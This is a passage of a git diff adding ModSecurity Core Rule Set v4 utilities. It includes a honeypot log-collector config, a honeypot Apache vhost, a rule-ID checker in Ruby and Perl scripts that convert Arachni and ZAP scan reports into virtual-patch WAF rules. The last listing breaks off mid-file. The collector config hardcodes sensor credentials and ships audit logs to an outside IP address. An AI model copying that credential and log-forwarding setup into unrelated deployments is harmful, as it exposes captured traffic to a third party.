Required configuration +# At a minimum, the items in this section will need to be adjusted to +# fit your environment. The remaining options are optional. +########################################################################## + +# Points to the root of the installation. All relative +# paths will be resolved with the help of this path. +CollectorRoot "/var/log/mlogc" + +# ModSecurity Console receiving URI. You can change the host +# and the port parts but leave everything else as is. +ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver" + +# Sensor credentials +SensorUsername "honeypot-sensor" +SensorPassword "test1234" + +# Base directory where the audit logs are stored. This can be specified +# as a path relative to the CollectorRoot, or a full path. +LogStorageDir "data" + +# Transaction log will contain the information on all log collector +# activities that happen between checkpoints. The transaction log +# is used to recover data in case of a crash (or if Apache kills +# the process). +TransactionLog "mlogc-transaction.log" + +# The file where the pending audit log entry data is kept. This file +# is updated on every checkpoint. +QueuePath "mlogc-queue.log" + +# The location of the error log. +ErrorLog "mlogc-error.log" + +# The location of the lock file. +LockFile "mlogc.lck" + +# Keep audit log entries after sending? (0=false 1=true) +# NOTE: This is required to be set in SecAuditLog mlogc config if you +# are going to use a secondary console via SecAuditLog2. +KeepEntries 0 + + +########################################################################## +# Optional configuration +########################################################################## + +# The error log level controls how much detail there +# will be in the error log. The levels are as follows: +# 0 - NONE +# 1 - ERROR +# 2 - WARNING +# 3 - NOTICE +# 4 - DEBUG +# 5 - DEBUG2 +# +ErrorLogLevel 3 + +# How many concurrent connections to the server +# are we allowed to open at the same time? Log collector uses +# multiple connections in order to speed up audit log transfer. +# This is especially needed when the communication takes place +# over a slow link (e.g. not over a LAN). +MaxConnections 10 + +# How many requests a worker will process before recycling itself. +# This is to help prevent problems due to any memory leaks that may +# exists. If this is set to 0, then no maximum is imposed. The default +# is 1000 requests per worker (the number of workers is controlled by the +# MaxConnections limit). +MaxWorkerRequests 1000 + +# The time each connection will sit idle before being reused, +# in milliseconds. Increase if you don't want ModSecurity Console +# to be hit with too many log collector requests. +TransactionDelay 50 + +# The time to wait before initialization on startup in milliseconds. +# Increase if mlogc is starting faster then termination when the +# sensor is reloaded. +StartupDelay 5000 + +# How often is the pending audit log entry data going to be written +# to a file. The default is 15 seconds. +CheckpointInterval 15 + +# If the server fails all threads will back down until the +# problem is sorted. The management thread will periodically +# launch a thread to test the server. The default is to test +# once in 60 seconds. +ServerErrorTimeout 60 + +# The following two parameters are not used yet, but +# reserved for future expansion. +# KeepAlive 150 +# KeepAliveTimeout 300 diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf new file mode 100644 index 000000000..7002bb76e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf @@ -0,0 +1,30 @@ +# +# Add in honeypot ports. +# - These are common proxy ports used by attackers +# - All traffic accepted on these ports are suspicious. +# +Listen 8000 +Listen 8080 +Listen 8888 + +# +# Create basic virtual host containers that will forward all traffic received +# to the official ModSecurity Project honeypot logging host. +# +# - You should adjust the Document root location to an empty directory on your server +# - Also adjust the path to your local ModSecurity mlogc program and for the +# mlogc-honeypot-sensor.conf file. +# - Make sure you main SecAuditLogType is set to concurrent mode. +# + +ServerName www.example1.com +DocumentRoot "/usr/local/apache/honeypot-htdocs" + + Options none + AllowOverride None + Order allow,deny + Allow from all + +SecAuditEngine On +SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" + diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/id-range b/src/common/core/modsecurity/files/coreruleset-v4/util/id-range new file mode 100644 index 000000000..a58cf06e4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/id-range @@ -0,0 +1,2 @@ +900000-2999999 +2000000-299999 diff --git a/src/common/core/modsecurity/files/coreruleset/util/join-multiline-rules/join.py b/src/common/core/modsecurity/files/coreruleset-v4/util/join-multiline-rules/join.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/join-multiline-rules/join.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/join-multiline-rules/join.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-dictionary-creator.sh b/src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-dictionary-creator.sh similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-dictionary-creator.sh rename to src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-dictionary-creator.sh diff --git a/src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-high-risk-functions.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-high-risk-functions.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/php-dictionary-gen/php-high-risk-functions.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/php-dictionary-gen/php-high-risk-functions.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/regexp-tricks/negative-lookahead.py b/src/common/core/modsecurity/files/coreruleset-v4/util/regexp-tricks/negative-lookahead.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/regexp-tricks/negative-lookahead.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/regexp-tricks/negative-lookahead.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/pyproject.toml b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/pyproject.toml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/pyproject.toml rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/pyproject.toml diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/requirements.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/requirements.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/requirements.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/rule_ctl.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/rule_ctl.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/rule_ctl.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/rule_ctl.py diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/empty-after.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/__init__.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/plugins/empty-after.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/__init__.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/helpers.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/helpers.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/helpers.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/helpers.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_actions_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_actions_test.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_actions_test.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_actions_test.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_ctl_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_ctl_test.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_ctl_test.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_ctl_test.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_tags_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_tags_test.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_tags_test.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_tags_test.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_test.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_test.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_test.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_transformations_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_transformations_test.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_transformations_test.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_transformations_test.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_variables_test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_variables_test.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/rule_ctl_variables_test.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/rule_ctl/tests/rule_ctl_variables_test.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/send-payload-pls.sh b/src/common/core/modsecurity/files/coreruleset-v4/util/send-payload-pls.sh similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/send-payload-pls.sh rename to src/common/core/modsecurity/files/coreruleset-v4/util/send-payload-pls.sh diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/verify.rb b/src/common/core/modsecurity/files/coreruleset-v4/util/verify.rb new file mode 100755 index 000000000..6619fcbc5 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/verify.rb @@ -0,0 +1,117 @@ +#!/usr/bin/env ruby +# -*- coding: utf-8 -*- +# +# Copyright © 2012 Diego Elio Pettenò +# +# Permission to use, copy, modify, and distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS +# ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES +# OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE +# CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL +# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR +# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS +# SOFTWARE. + +require 'set' + +seen_ids = Set.new +res = 0 + +# read reserved id range from the id-range file so that it can be +# configured on a per-repository basis. +range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i)) + +# open all the rule files +Dir.chdir("../") +Dir["**/*.conf"].each do |rulefile| + # read the content + content = File.read(rulefile) + + lineno = 0 + this_chained = next_chained = false + prevline = nil + + # for each line in the rule file + content.each_line do |line| + lineno += 1 + + # handle continuation lines + line = (prevline + line) unless prevline.nil? + + # remove comments + line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 } + + if line =~ /\\\n$/ + prevline = line.gsub(/\\\n/, '') + next + else + prevline = nil + end + + # skip if it's an empty line (this also skip comment-only lines) + next if line =~ /(?:^\s+$|^#)/ + + this_chained = next_chained + next_chained = false + + # split the directive in its components, considering quoted strings + directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten + directive.map! do |piece| + # then make sure to split the quoting out of the quoted strings + (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece + end + + # skip if it's not a SecRule or SecAction + case directive[0] + when "SecRule" + rawrule = directive[3] + when "SecAction" + rawrule = directive[1] + else + next + end + + # get the rule and split in its components + rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/) + + if rule.include?("chain") + next_chained = true + end + + ids = rule.find_all { |piece| piece =~ /^id:/ } + if ids.size > 1 + $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids" + next + elsif ids.size == 0 + id = nil + else + id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i + end + + if this_chained + unless id.nil? + $stderr.puts "#{rulefile}:#{lineno} chained rule with id" + res = 1 + end + next + elsif id.nil? + $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})" + res = 1 + next + elsif ! range.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}" + res = 1 + elsif seen_ids.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}" + res = 1 + end + + seen_ids << id + end +end + +exit res diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/arachni2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/arachni2modsec.pl new file mode 100755 index 000000000..9b6a3c256 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/arachni2modsec.pl @@ -0,0 +1,318 @@ +#!/opt/local/bin/perl -T + +############################################# +# -=[ Virtual Patching Converter Script ]=- # +# Converts arachni XML Output # +# https://github.com/Zapotek/arachni # +# # +# arachni2modsec.pl # +# Version: 1.0 # +# # +# Copyright 2011 # +# Trustwave's SpiderLabs Research Team # +# www.trustwave.com # +# # +# Based On Code Originally Created by: # +# The Denim Group # +# www.denimgroup.com # +############################################# + +use XML::Smart; +use Switch; +use Data::Types qw(:all); +use Data::Validate::URI qw(is_uri); +use Getopt::Std; +use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later + +############# +# Variables # +############# + +# [Configuration Vars] +my %param; +getopt("f",\%param); +$filename = $param{f}; +my $all_vulnerabilities_filename = "$filename"; + +unless ($filename) { + print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n"; + exit; +} + + +my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; + +# [End Config Vars] + +my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)"; +my $VULN_CLASS_SQLI = "SQL Injection"; +my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection"; +my $VULN_CLASS_LFI = "Path Traversal"; +my $VULN_CLASS_RFI = "Remote file inclusion"; +my $VULN_CLASS_HTTPRS = "Response splitting"; + +# Only the vulnerabilities in this array will have +# rules generated for them. +my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); + +my $num_rules_generated=0; +my $num_not_supported=0; +my $num_bad_urls=0; + +my $wait_for_keypress=1; +my $request_failed=0; + +my $all_vulns_xml; +my @type; +my @id; +my $vuln_count; + +my $num_attacks_flag=0; +my $num_attacks_noflag=0; + +# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +############# +# Main # +############# + +# Clean up env so perl doesn't complain +# when trying to run the restart snort +# script. +delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; + +$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); + +@type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name'); +@url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url'); +@param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable'); + +open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; +$MODSEC_RULES->autoflush(1); + +$vuln_count = 0; + +foreach my $current_type (@type){ + print "==================================================================================================\n"; + print "Vulnerability[$vuln_count] - Type: $current_type\n"; + + if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ + parseData(to_string($current_type)); + }else { + print "Vulnerability Type: $type is not supported in this version.\n"; + $num_not_supported++; + } + $vuln_count++; +} + +close($MODSEC_RULES); + +print "==================================================================================================\n"; + +print "\n\n************ END OF SCRIPT RESULTS *****************\n"; +print "Number of Vulnerabilities Processed: $vuln_count\n"; +print "Number of ModSecurity rules generated: $num_rules_generated\n"; +print "Number of Unsupported vulns skipped: $num_not_supported\n"; +print "Number of bad URLs (rules not gen): $num_bad_urls\n"; +print "****************************************************\n\n"; +print "----------------------------------------------------\n"; +print "To activate the virtual patching file ($modsec_rules_file),\n"; +print "copy it into the CRS \"base_rules\" directory and then create\n"; +print "a symlink to it in the \"activated_rules\" directory.\n"; +print "-----------------------------------------------------\n\n"; + + +############### +# Subroutines # +############### +sub parseData +{ + my($vuln_str) = @_; + my $vuln_detail_filename; + my $current_vuln_xml; + my $current_vuln_url; + my $current_vuln_param; + my $current_uricontent; + my @current_params; + my $id = $vuln_count; + + print "Found a $vuln_str vulnerability.\n"; + + $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); + $current_vuln_url = $url[$vuln_count]; + + print URL_LIST "$current_vuln_url\n"; + + # Validate url (need separate sub?) + print "Validating URL: $current_vuln_url\n"; + if(is_uri(to_string($current_vuln_url))){ + print "URL is well-formed\n"; + print "Continuing Rule Generation\n"; + } else { + print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; + $num_bad_urls++; + + # Waits for keypress in test mode so you can + # see why the URL failed validation. + if($test_mode){ + wait_for_keypress(); + } + return; + } + + $current_uricontent = get_uricontent($current_vuln_url); + + + # Only need param if XSS attack,SQLINJ,XPATH + # and maybe for HTTPRS, DT. + # NOT for PRL and DI + + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + @current_params = $param[$vuln_count]; + + } + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + print "Current vulnerable Param(s): @current_params\n"; + } + + generate_patch($vuln_str,$current_uricontent,@current_params); + + +} + + +sub generate_patch +{ + my($type,$uricontent,@params,$current_vuln_xml) = @_; + my $rule = ""; + $id = "1".$vuln_count; + + switch($type) + { + case ($VULN_CLASS_XSS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + # Check to see if each vulnerable parameter is valid + # then generate a rule using both uricontent and the + # parameter + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + } + } + } + } + + case ($VULN_CLASS_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_BLIND_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_LFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_RFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_HTTPRS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + } +} + +sub get_uricontent +{ + my($url) = @_; + my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; + + # First, trim the first part out of the URL: + # http://.../ + $url =~ /$regex/; + substr($url,index($url,$&),length($&)) = ""; + + # If the URL contains a php or cgi query with + # one or more params and values, trim those out. + # Trim from the question mark to the end. + if($url =~ /\?/){ + substr($url,index($url,"?")) = ""; + } + return $url; + +} diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/zap2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/zap2modsec.pl new file mode 100755 index 000000000..03fa21e03 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/virtual-patching/zap2modsec.pl @@ -0,0 +1,318 @@ +#!/opt/local/bin/perl -T + +############################################# +# -=[ Virtual Patching Converter Script ]=- # +# Converts OWASP ZAP XML Output # +# https://code.google.com/p/zaproxy/ # +# # +# zap2modsec.pl # +# Version: 1.0 # +# # +# Copyright 2011 # +# Trustwave's SpiderLabs Research Team # +# www.trustwave.com # +# # +# Based On Code Originally Created by: # +# The Denim Group # +# www.denimgroup.com # +############################################# + +use XML::Smart; +use Switch; +use Data::Types qw(:all); +use Data::Validate::URI qw(is_uri); +use Getopt::Std; +use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later + +############# +# Variables # +############# + +# [Configuration Vars] +my %param; +getopt("f",\%param); +$filename = $param{f}; +my $all_vulnerabilities_filename = "$filename"; + +unless ($filename) { + print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n"; + exit; +} + + +my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; + +# [End Config Vars] + +my $VULN_CLASS_XSS = "Cross Site Scripting"; +my $VULN_CLASS_SQLI = "SQL Injection"; +my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting"; +my $VULN_CLASS_LFI = "Path Traversal"; +my $VULN_CLASS_RFI = "Remote File Inclusion"; +my $VULN_CLASS_HTTPRS = "HTTP Response Splitting"; + +# Only the vulnerabilities in this array will have +# rules generated for them. +my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); + +my $num_rules_generated=0; +my $num_not_supported=0; +my $num_bad_urls=0; + +my $wait_for_keypress=1; +my $request_failed=0; + +my $all_vulns_xml; +my @type; +my @id; +my $vuln_count; + +my $num_attacks_flag=0; +my $num_attacks_noflag=0; + +# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +############# +# Main # +############# + +# Clean up env so perl doesn't complain +# when trying to run the restart snort +# script. +delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; + +$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); + +@type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert'); +@url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri'); +@param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param'); + +open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; +$MODSEC_RULES->autoflush(1); + +$vuln_count = 0; + +foreach my $current_type (@type){ + print "==================================================================================================\n"; + print "Vulnerability[$vuln_count] - Type: $current_type\n"; + + if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ + parseData(to_string($current_type)); + }else { + print "Vulnerability Type: $type is not supported in this version.\n"; + $num_not_supported++; + } + $vuln_count++; +} + +close($MODSEC_RULES); + +print "==================================================================================================\n"; + +print "\n\n************ END OF SCRIPT RESULTS *****************\n"; +print "Number of Vulnerabilities Processed: $vuln_count\n"; +print "Number of ModSecurity rules generated: $num_rules_generated\n"; +print "Number of Unsupported vulns skipped: $num_not_supported\n"; +print "Number of bad URLs (rules not gen): $num_bad_urls\n"; +print "****************************************************\n\n"; +print "----------------------------------------------------\n"; +print "To activate the virtual patching file ($modsec_rules_file),\n"; +print "copy it into the CRS \"base_rules\" directory and then create\n"; +print "a symlink to it in the \"activated_rules\" directory.\n"; +print "-----------------------------------------------------\n\n"; + + +############### +# Subroutines # +############### +sub parseData +{ + my($vuln_str) = @_; + my $vuln_detail_filename; + my $current_vuln_xml; + my $current_vuln_url; + my $current_vuln_param; + my $current_uricontent; + my @current_params; + my $id = $vuln_count; + + print "Found a $vuln_str vulnerability.\n"; + + $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); + $current_vuln_url = $url[$vuln_count]; + + print URL_LIST "$current_vuln_url\n"; + + # Validate url (need separate sub?) + print "Validating URL: $current_vuln_url\n"; + if(is_uri(to_string($current_vuln_url))){ + print "URL is well-formed\n"; + print "Continuing Rule Generation\n"; + } else { + print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; + $num_bad_urls++; + + # Waits for keypress in test mode so you can + # see why the URL failed validation. + if($test_mode){ + 